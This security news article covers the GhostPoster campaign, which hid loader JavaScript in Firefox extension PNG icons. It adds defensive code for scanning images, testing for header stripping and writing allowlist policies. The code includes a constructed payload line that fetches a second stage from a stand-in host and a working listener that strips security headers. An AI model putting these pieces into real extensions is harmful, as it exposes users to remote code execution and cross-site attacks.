Koi researchers have uncovered a large-scale Firefox extension malware campaign that hid malicious code inside something most users never scrutinize: an extension’s logo.
Named GhostPoster, the campaign used steganography to embed executable JavaScript inside PNG icon files, ultimately infecting more than 50,000 Firefox users through trusted add-ons.
The campaign delivers “… a multi-stage malware payload that monitors everything you browse, strips away your browser’s security protections, and opens a backdoor for remote code execution,” said Koi researchers.
GhostPoster Campaign Targets Trusted Extensions
GhostPoster highlights how browser extensions — often implicitly trusted by users and organizations — remain a high-risk attack surface.
The campaign spans at least 17 Firefox extensions, including Free VPN Forever, which alone had more than 16,000 installs and was still listed on the Firefox Add-ons marketplace at the time of analysis.
Collectively, the extensions promise benign functionality such as VPN access, translation tools, weather updates, and ad blocking, while silently delivering a persistent, multi-stage malware payload.
How the GhostPoster Infection Chain Works
The GhostPoster infection chain begins with an extension loading its own icon file — standard behavior for any browser add-on.
Instead of simply rendering the image, however, the extension reads the raw bytes of the PNG file and scans for a specific marker sequence (===). Everything after that marker is not image data, but hidden JavaScript embedded directly in the file.
This technique, which the researchers describe as steganography, lets the malicious code slip past static scanning and manual review: a scanner that treats .png files as inert image assets, and a reviewer who only opens the extension's JavaScript sources, both see nothing suspicious, and the icon still renders normally in the browser toolbar.
Each time the extension loads, however, the hidden JavaScript is extracted from the image bytes and executed.
The code embedded in the PNG does not contain the final malware.
Instead, it acts as a loader that retrieves additional payloads from attacker-controlled infrastructure.
The loader contacts liveupdt[.]com and, if unavailable, falls back to dealctr[.]com, passing a unique signature so operators can track infected installations.
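The check a practitioner wants here is a chunk-aware scan of every PNG shipped in an extension: walk the chunk list to the final IEND chunk (image decoders stop reading there, which is why an icon with bytes behind it still renders), report anything that trails it, and pull out whatever follows the marker. The following is an added example written for this page, not code from Koi's report or from the campaign. The sample PNG and the loader-style payload string are constructed inline; the "===" marker is the one the article names, and the assumption that the payload sits after IEND is this example's, not a detail the article states.

```javascript
// PNG trailer scanner: walks the chunk list, reports any bytes appended after the
// final IEND chunk, and extracts the text that follows a marker ("===" here).

const PNG_SIGNATURE = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);

// Return the offset just past the IEND chunk, or -1 if the file is not a well-formed PNG.
function pngEndOffset(bytes) {
  if (bytes.length < 8 || !bytes.subarray(0, 8).equals(PNG_SIGNATURE)) return -1;
  let off = 8;
  while (off + 12 <= bytes.length) {        // 4 length + 4 type + 4 CRC minimum
    const len = bytes.readUInt32BE(off);
    const type = bytes.toString("ascii", off + 4, off + 8);
    const next = off + 12 + len;
    if (next > bytes.length) return -1;      // truncated chunk
    if (type === "IEND") return next;
    off = next;
  }
  return -1;                                 // no IEND chunk at all
}

// Scan result: whether the PNG parsed, how many bytes trail IEND, and any text
// found after the marker inside that trailer.
function scanPngTrailer(bytes, marker = "===") {
  const end = pngEndOffset(bytes);
  if (end < 0) return { valid: false, trailerBytes: 0, hiddenScript: null };
  const trailer = bytes.subarray(end);
  const idx = trailer.indexOf(marker);
  return {
    valid: true,
    trailerBytes: trailer.length,
    hiddenScript: idx >= 0 ? trailer.subarray(idx + marker.length).toString("utf8") : null,
  };
}

// --- constructed sample files (not real campaign artefacts) ---

function crc32(buf) {
  let crc = 0xffffffff;
  for (const b of buf) {
    crc ^= b;
    for (let i = 0; i < 8; i++) crc = (crc >>> 1) ^ (0xedb88320 & -(crc & 1));
  }
  return (crc ^ 0xffffffff) >>> 0;
}

function pngChunk(type, data) {
  const len = Buffer.alloc(4);
  len.writeUInt32BE(data.length, 0);
  const typeBuf = Buffer.from(type, "ascii");
  const crc = Buffer.alloc(4);
  crc.writeUInt32BE(crc32(Buffer.concat([typeBuf, data])), 0);
  return Buffer.concat([len, typeBuf, data, crc]);
}

function buildSamples() {
  const ihdr = Buffer.alloc(13);
  ihdr.writeUInt32BE(1, 0);   // width 1
  ihdr.writeUInt32BE(1, 4);   // height 1
  ihdr[8] = 8;                // bit depth 8
  ihdr[9] = 0;                // colour type 0: greyscale
  // zlib stream with one stored block: filter byte 0x00 + one black pixel 0x00.
  const idat = Buffer.from([0x78, 0x01, 0x01, 0x02, 0x00, 0xfd, 0xff, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01]);
  const clean = Buffer.concat([
    PNG_SIGNATURE, pngChunk("IHDR", ihdr), pngChunk("IDAT", idat), pngChunk("IEND", Buffer.alloc(0)),
  ]);
  // Same image with a loader-style snippet appended behind the marker (constructed).
  const payload = 'fetch("https://updates.example/stage2").then(r => r.text())';
  const poisoned = Buffer.concat([clean, Buffer.from("===" + payload, "utf8")]);
  return { clean, poisoned, payload };
}

const samples = buildSamples();
console.log(scanPngTrailer(samples.clean));     // trailerBytes: 0, hiddenScript: null
console.log(scanPngTrailer(samples.poisoned));  // trailerBytes > 0, hiddenScript: the fetch snippet
```

Any non-zero trailer on an icon is worth a look even without the marker, since a legitimate build pipeline has no reason to put bytes after IEND. A loader could also hide the marker inside an ancillary chunk such as tEXt, so a fuller audit greps the whole file for the marker as well as checking the trailer.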
How GhostPoster Evades Detection
GhostPoster relies on layered evasion techniques to avoid detection. The loader checks in only every 48 hours and downloads the next-stage payload just 10% of the time.
This probabilistic behavior makes short observation windows unreliable: a sandbox run or a day of network monitoring may never see a beacon or a download, so an infected extension can look completely inactive.
When payloads are delivered, they are obfuscated using custom encoding — swapping character case, altering numeric values, Base64 decoding, and XOR encryption tied to the extension’s runtime ID.
The decoded payload is kept in the extension's browser storage, so it persists across restarts without dropping a standalone file outside the browser profile.
Because the payload lives inside extension storage and runs only in the extension's memory, file-based scanners and a quick forensic triage of the filesystem are unlikely to find it.
Inside the GhostPoster Browser Payload
Once active, the GhostPoster payload provides attackers with full control over the victim’s browser environment.
One primary monetization method is affiliate link hijacking, where legitimate affiliate links on major e-commerce platforms are silently replaced with attacker-controlled links, redirecting commissions without disrupting the user’s experience.
The malware also injects tracking code into every page visited, using Google Analytics identifiers to collect browsing behavior, installation timelines, and merchant activity.
Hidden HTML elements are dynamically inserted into pages to store metadata and identifiers tied to the infected browser.
The extension also strips key browser security headers — including Content-Security-Policy and X-Frame-Options — from HTTP responses.
This weakens built-in defenses against cross-site scripting and clickjacking across all sites the user visits.
Additional capabilities include CAPTCHA bypass mechanisms, invisible iframe injection for ad and click fraud, referrer manipulation, and dynamic cleanup to remove visible artifacts after execution.
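Header stripping of the kind described above is something an extension reviewer can test for directly: feed a synthetic response through the extension's onHeadersReceived listeners and diff the headers before and after. The following is an added example, not code from the campaign or from Koi's analysis. The mock of browser.webRequest, the stripping listener (a reconstruction of the behaviour the article describes, written against the public webRequest API) and the sample response are all constructed here; the article does not say which API the malware used.

```javascript
// Review harness: mock browser.webRequest.onHeadersReceived, register a listener
// that drops Content-Security-Policy and X-Frame-Options, replay a synthetic
// response, and report which security headers disappeared.

const SECURITY_HEADERS = [
  "content-security-policy",
  "x-frame-options",
  "strict-transport-security",
  "x-content-type-options",
  "cross-origin-opener-policy",
];

// Minimal stand-in for browser.webRequest: records listeners, then replays a
// response through them in registration order, honouring the responseHeaders
// returned by any listener registered as "blocking".
function makeMockWebRequest() {
  const listeners = [];
  return {
    onHeadersReceived: {
      addListener(fn, filter, extraInfoSpec = []) {
        listeners.push({ fn, filter, blocking: extraInfoSpec.includes("blocking") });
      },
    },
    fire(details) {
      let current = details;
      for (const l of listeners) {
        const result = l.fn(current);
        if (l.blocking && result && result.responseHeaders) {
          current = { ...current, responseHeaders: result.responseHeaders };
        }
      }
      return current;
    },
  };
}

// Reconstruction of the stripping behaviour (not GhostPoster's own code): a
// blocking listener on every URL that filters two headers out of each response.
function registerHeaderStripper(webRequest) {
  const DROP = new Set(["content-security-policy", "x-frame-options"]);
  webRequest.onHeadersReceived.addListener(
    (details) => ({
      responseHeaders: details.responseHeaders.filter((h) => !DROP.has(h.name.toLowerCase())),
    }),
    { urls: ["<all_urls>"] },
    ["blocking", "responseHeaders"],
  );
}

// Detection: security-relevant headers present before the listeners ran and
// absent afterwards.
function removedSecurityHeaders(before, after) {
  const names = (hs) => new Set(hs.map((h) => h.name.toLowerCase()));
  const b = names(before);
  const a = names(after);
  return SECURITY_HEADERS.filter((n) => b.has(n) && !a.has(n));
}

// Constructed response, as the server sent it.
function sampleResponse() {
  return {
    url: "https://shop.example/checkout",
    statusCode: 200,
    responseHeaders: [
      { name: "Content-Type", value: "text/html; charset=utf-8" },
      { name: "Content-Security-Policy", value: "default-src 'self'; script-src 'self'" },
      { name: "X-Frame-Options", value: "DENY" },
      { name: "Strict-Transport-Security", value: "max-age=31536000" },
    ],
  };
}

function runCheck() {
  const webRequest = makeMockWebRequest();
  registerHeaderStripper(webRequest);
  const original = sampleResponse();
  const seenByPage = webRequest.fire(original);
  return removedSecurityHeaders(original.responseHeaders, seenByPage.responseHeaders);
}

console.log(runCheck());  // ["content-security-policy", "x-frame-options"]
```

In a real review the harness loads the extension's background script against the mock instead of calling registerHeaderStripper. A listener that rewrites response headers needs the webRequest and webRequestBlocking permissions plus host permissions for the sites it touches, so a "weather" or "translation" add-on whose manifest requests those for `<all_urls>` is already a flag before any dynamic test runs.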
How to Reduce Browser Extension Risk
The following practices help organizations manage browser extension risk.
- Treat browser extensions as part of the endpoint attack surface and restrict installation using browser policies and approved allowlists (in Firefox, the ExtensionSettings enterprise policy).
- Audit installed extensions regularly, with particular scrutiny on “free” services such as VPNs or utilities that request broad permissions.
- Monitor extension behavior for signs of abuse, including unexpected network connections, dynamic code execution, or response manipulation.
- Integrate browser and extension telemetry into EDR or SIEM platforms to improve detection and correlation of suspicious activity.
- Apply network-level controls, such as DNS filtering or secure web gateways, to block known malicious extension infrastructure.
- Educate users to install extensions only from trusted publishers and remove add-ons that are no longer necessary or actively maintained.
Together, these controls help reduce browser-based risk by improving visibility, limiting unnecessary exposure, and strengthening overall endpoint security posture.
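For the first two practices above, the concrete artefact is a Firefox ExtensionSettings policy that blocks everything by default and lists approved add-ons explicitly. The following added example (not from the article or from Mozilla's documentation) builds such a policy, evaluates the precedence rule Firefox applies (a per-ID entry overrides the "*" default), and audits a constructed inventory of installed extension IDs against it. The extension IDs, download host and inventory are hypothetical placeholders.

```javascript
// Build a Firefox ExtensionSettings policy, resolve what it decides for a given
// extension ID, and audit an installed-extension inventory against it.
// Firefox loads the policy from distribution/policies.json in its install
// directory (or the equivalent GPO / macOS profile keys).

// Hypothetical approved extensions: ID -> install URL for force-installed add-ons,
// or null for add-ons users may install themselves.
const APPROVED = {
  "corp-sso-helper@corp.example": "https://extensions.corp.example/corp-sso-helper.xpi",
  "notes@corp.example": null,
};

function buildExtensionPolicy(approved) {
  const settings = {
    "*": {
      installation_mode: "blocked",
      blocked_install_message: "Extensions must be approved by IT security.",
      install_sources: ["https://extensions.corp.example/"],
      allowed_types: ["extension"],
    },
  };
  for (const [id, installUrl] of Object.entries(approved)) {
    settings[id] = installUrl
      ? { installation_mode: "force_installed", install_url: installUrl, updates_disabled: false }
      : { installation_mode: "allowed" };
  }
  return { policies: { ExtensionSettings: settings } };
}

// What the policy does with one extension ID: a per-ID entry wins over "*",
// and with no "*" entry Firefox leaves the extension allowed.
function installDecision(policy, extensionId) {
  const settings = policy.policies.ExtensionSettings;
  const entry = settings[extensionId] || settings["*"] || { installation_mode: "allowed" };
  return entry.installation_mode;
}

// Audit a list of installed extension IDs (from about:support or a fleet
// inventory) and return the ones the policy would block.
function auditInstalled(policy, installedIds) {
  return installedIds.filter((id) => installDecision(policy, id) === "blocked");
}

const policy = buildExtensionPolicy(APPROVED);
console.log(JSON.stringify(policy, null, 2));   // contents for distribution/policies.json

// Constructed inventory: one approved add-on and one unsanctioned "free VPN"-style
// add-on with a placeholder GUID-style ID.
console.log(auditInstalled(policy, [
  "corp-sso-helper@corp.example",
  "{0f1e2d3c-4b5a-6978-8a9b-0c1d2e3f4a5b}",
]));   // ["{0f1e2d3c-4b5a-6978-8a9b-0c1d2e3f4a5b}"]
```

Blocking on "*" also removes already-installed extensions that have no entry, so run the audit against the fleet inventory first and add genuinely needed add-ons before the policy is pushed; otherwise the rollout silently uninstalls tools people depend on.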
Attackers Exploit Trust Signals
GhostPoster reflects a broader trend in which attackers exploit trust signals rather than technical vulnerabilities.
By hiding malware in images and spreading it through legitimate marketplaces, attackers bypass traditional security assumptions and operate entirely within expected browser behavior.
This trend reinforces why many organizations are adopting zero-trust principles that remove implicit trust and continuously verify activity, even when it appears legitimate.
